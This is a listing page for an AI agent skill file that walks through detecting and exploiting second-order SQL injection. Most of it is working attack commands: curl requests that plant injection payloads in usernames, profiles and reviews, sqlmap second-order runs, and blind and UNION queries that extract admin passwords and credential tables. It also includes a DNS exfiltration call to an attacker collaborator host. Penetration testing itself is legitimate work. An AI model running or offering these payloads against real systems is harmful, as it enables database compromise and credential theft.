performing-second-order-sql-injection
Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.
Best use case
performing-second-order-sql-injection is best used when you need a repeatable AI agent workflow instead of a one-off prompt.
Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.
Teams using performing-second-order-sql-injection should expect a more consistent output, faster repeated execution, less prompt rewriting.
When to use this skill
- You want a reusable workflow that can be run more than once with consistent structure.
When not to use this skill
- You only need a quick one-off answer and do not need a reusable workflow.
- You cannot install or maintain the underlying files, dependencies, or repository context.
Installation
Claude Code / Cursor / Codex
Manual Installation
- Download SKILL.md from GitHub
- Place it in
.claude/skills/performing-second-order-sql-injection/SKILL.mdinside your project - Restart your AI agent — it will auto-discover the skill
How performing-second-order-sql-injection Compares
| Feature / Agent | performing-second-order-sql-injection | Standard Approach |
|---|---|---|
| Platform Support | Not specified | Limited / Varies |
| Context Awareness | High | Baseline |
| Installation Complexity | Unknown | N/A |
Frequently Asked Questions
What does this skill do?
Detect and exploit second-order SQL injection vulnerabilities where malicious input is stored in a database and later executed in an unsafe SQL query during a different application operation.
Where can I find the source code?
You can find the source code on GitHub using the link provided at the top of the page.
Related Guides
AI Agents for Coding
Browse AI agent skills for coding, debugging, testing, refactoring, code review, and developer workflows across Claude, Cursor, and Codex.
AI Agents for Marketing
Discover AI agents for marketing workflows, from SEO and content production to campaign research, outreach, and analytics.
AI Agents for Startups
Explore AI agent skills for startup validation, product research, growth experiments, documentation, and fast execution with small teams.
SKILL.md Source
# Performing Second-Order SQL Injection ## When to Use - When first-order SQL injection testing reveals proper input sanitization at storage time - During penetration testing of applications with user-generated content stored in databases - When testing multi-step workflows where stored data feeds subsequent database queries - During assessment of admin panels that display or process user-submitted data - When evaluating stored procedure execution paths that use previously stored data ## Prerequisites - Burp Suite Professional for request tracking across application flows - SQLMap with second-order injection support (--second-url flag) - Understanding of SQL injection fundamentals and blind extraction techniques - Two or more application functions (one for storing data, another for triggering execution) - Database error message monitoring or blind technique knowledge - Multiple user accounts for testing stored data across different contexts ## Workflow ### Step 1 — Identify Storage and Trigger Points ```bash # Map the application to identify: # 1. STORAGE POINTS: Where user input is saved to database # - User registration (username, email, address) # - Profile update forms # - Comment/review submission # - File upload metadata # - Order/booking details # 2. TRIGGER POINTS: Where stored data is used in queries # - Admin panels displaying user data # - Report generation # - Search functionality using stored preferences # - Password reset using stored email # - Export/download features # Register a user with SQL injection in the username curl -X POST http://target.com/register \ -d "username=admin'--&password=test123&email=test@test.com" ``` ### Step 2 — Inject Payloads via Storage Points ```bash # Store SQL injection payload in username during registration curl -X POST http://target.com/register \ -d "username=test' OR '1'='1'--&password=Test1234&email=test@test.com" # Store injection in profile fields curl -X POST http://target.com/api/profile \ -H "Cookie: session=AUTH_TOKEN" \ -d "display_name=test' UNION SELECT password FROM users WHERE username='admin'--" # Store injection in address field curl -X POST http://target.com/api/address \ -H "Cookie: session=AUTH_TOKEN" \ -d "address=123 Main St' OR 1=1--&city=Test&zip=12345" # Store injection in comment/review curl -X POST http://target.com/api/review \ -H "Cookie: session=AUTH_TOKEN" \ -d "product_id=1&review=Great product' UNION SELECT table_name FROM information_schema.tables--" ``` ### Step 3 — Trigger Execution of Stored Payloads ```bash # Trigger via password change (uses stored username) curl -X POST http://target.com/change-password \ -H "Cookie: session=AUTH_TOKEN" \ -d "old_password=Test1234&new_password=NewPass123" # Trigger via admin user listing curl -H "Cookie: session=ADMIN_TOKEN" http://target.com/admin/users # Trigger via data export curl -H "Cookie: session=AUTH_TOKEN" http://target.com/api/export-data # Trigger via search using stored preferences curl -H "Cookie: session=AUTH_TOKEN" http://target.com/api/recommendations # Trigger via report generation curl -H "Cookie: session=ADMIN_TOKEN" "http://target.com/admin/reports?type=user-activity" ``` ### Step 4 — Use SQLMap for Second-Order Injection ```bash # SQLMap with --second-url for second-order injection # Store payload at registration, trigger at profile page sqlmap -u "http://target.com/register" \ --data="username=*&password=test&email=test@test.com" \ --second-url="http://target.com/profile" \ --cookie="session=AUTH_TOKEN" \ --batch --dbs # Use --second-req for complex trigger requests sqlmap -u "http://target.com/api/update-profile" \ --data="display_name=*" \ --second-req=trigger_request.txt \ --cookie="session=AUTH_TOKEN" \ --batch --tables # Content of trigger_request.txt: # GET /admin/users HTTP/1.1 # Host: target.com # Cookie: session=ADMIN_TOKEN ``` ### Step 5 — Blind Second-Order Extraction ```bash # Boolean-based blind: Check if stored payload causes different behavior # Store: test' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'-- curl -X POST http://target.com/api/profile \ -H "Cookie: session=AUTH_TOKEN" \ -d "display_name=test' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--" # Trigger and observe response difference curl -H "Cookie: session=AUTH_TOKEN" http://target.com/profile # Time-based blind second-order # Store: test'; WAITFOR DELAY '0:0:5'-- curl -X POST http://target.com/api/profile \ -H "Cookie: session=AUTH_TOKEN" \ -d "display_name=test'; WAITFOR DELAY '0:0:5'--" # Out-of-band extraction via DNS # Store: test'; EXEC xp_dirtree '\\attacker.burpcollaborator.net\share'-- curl -X POST http://target.com/api/profile \ -H "Cookie: session=AUTH_TOKEN" \ -d "display_name=test'; EXEC master..xp_dirtree '\\\\attacker.burpcollaborator.net\\share'--" ``` ### Step 6 — Escalate to Full Database Compromise ```bash # Once injection is confirmed, enumerate database # Store UNION-based payload curl -X POST http://target.com/api/profile \ -d "display_name=test' UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()--" # Extract credentials curl -X POST http://target.com/api/profile \ -d "display_name=test' UNION SELECT GROUP_CONCAT(username,0x3a,password) FROM users--" # Trigger execution and read results curl http://target.com/profile ``` ## Key Concepts | Concept | Description | |---------|-------------| | Second-Order Injection | SQL payload stored safely, then executed unsafely in a later operation | | Storage Point | Application function where malicious input is saved to the database | | Trigger Point | Separate function that retrieves stored data and uses it in an unsafe query | | Trusted Data Assumption | Developer assumes database-stored data is safe, skipping parameterization | | Stored Procedure Chains | Injection through stored procedures that use previously saved user data | | Deferred Execution | Payload may not execute until hours or days after initial storage | | Cross-Context Injection | Data stored by one user triggers execution in another user's context | ## Tools & Systems | Tool | Purpose | |------|---------| | SQLMap | Automated SQL injection with --second-url support for second-order attacks | | Burp Suite | Request tracking and comparison across storage and trigger endpoints | | OWASP ZAP | Automated scanning with injection detection | | Commix | Automated command injection tool supporting second-order techniques | | Custom Python scripts | Building automated storage-and-trigger exploitation chains | | DBeaver/DataGrip | Direct database access for verifying stored payloads | ## Common Scenarios 1. **Username-Based Attack** — Register with a SQL injection payload as username; the payload executes when an admin views the user list 2. **Password Change Exploitation** — Store injection in username; when changing password, the application uses the stored username in an unsafe UPDATE query 3. **Report Generation Attack** — Inject payload in stored data fields; triggering report generation uses stored data in aggregate queries 4. **Cross-User Injection** — Inject payload in a shared data field (comments, reviews) that triggers when another user or admin processes the data 5. **Export Function Exploit** — Inject payload in profile data that triggers during CSV/PDF export operations ## Output Format ``` ## Second-Order SQL Injection Report - **Target**: http://target.com - **Storage Point**: POST /register (username field) - **Trigger Point**: GET /admin/users (admin panel) - **Database**: MySQL 8.0 ### Attack Flow 1. Registered user with username: `admin' UNION SELECT password FROM users--` 2. Application stored username safely using parameterized INSERT 3. Admin panel retrieves usernames with unsafe string concatenation in SELECT 4. Injected SQL executes, revealing all user passwords in admin view ### Data Extracted | Table | Columns | Records | |-------|---------|---------| | users | username, password, email | 150 | | admin_tokens | token, user_id | 3 | ### Remediation - Use parameterized queries for ALL database operations, including reads - Never trust data retrieved from the database as safe - Implement output encoding when displaying database content - Apply least-privilege database permissions - Enable SQL query logging for detecting injection attempts ```
Related Skills
testing-for-xxe-injection-vulnerabilities
Discovering and exploiting XML External Entity injection vulnerabilities to read server files, perform SSRF, and exfiltrate data during authorized penetration tests.
testing-for-xml-injection-vulnerabilities
Test web applications for XML injection vulnerabilities including XXE, XPath injection, and XML entity attacks to identify data exposure and server-side request forgery risks.
testing-for-host-header-injection
Test web applications for HTTP Host header injection vulnerabilities to identify password reset poisoning, web cache poisoning, SSRF, and virtual host routing manipulation risks.
testing-for-email-header-injection
Test web application email functionality for SMTP header injection vulnerabilities that allow attackers to inject additional email headers, modify recipients, and abuse contact forms for spam relay.
performing-yara-rule-development-for-detection
Develop precise YARA rules for malware detection by identifying unique byte patterns, strings, and behavioral indicators in executable files while minimizing false positives.
performing-wireless-security-assessment-with-kismet
Conduct wireless network security assessments using Kismet to detect rogue access points, hidden SSIDs, weak encryption, and unauthorized clients through passive RF monitoring.
performing-wireless-network-penetration-test
Execute a wireless network penetration test to assess WiFi security by capturing handshakes, cracking WPA2/WPA3 keys, detecting rogue access points, and testing wireless segmentation using Aircrack-ng and related tools.
performing-windows-artifact-analysis-with-eric-zimmerman-tools
Perform comprehensive Windows forensic artifact analysis using Eric Zimmerman's open-source EZ Tools suite including KAPE, MFTECmd, PECmd, LECmd, JLECmd, and Timeline Explorer for parsing registry hives, prefetch files, event logs, and file system metadata.
performing-wifi-password-cracking-with-aircrack
Captures WPA/WPA2 handshakes and performs offline password cracking using aircrack-ng, hashcat, and dictionary attacks during authorized wireless security assessments to evaluate passphrase strength and wireless network security posture.
performing-web-cache-poisoning-attack
Exploiting web cache mechanisms to serve malicious content to other users by poisoning cached responses through unkeyed headers and parameters during authorized security tests.
performing-web-cache-deception-attack
Execute web cache deception attacks by exploiting path normalization discrepancies between CDN caching layers and origin servers to cache and retrieve sensitive authenticated content.
performing-web-application-vulnerability-triage
Triage web application vulnerability findings from DAST/SAST scanners using OWASP risk rating methodology to separate true positives from false positives and prioritize remediation.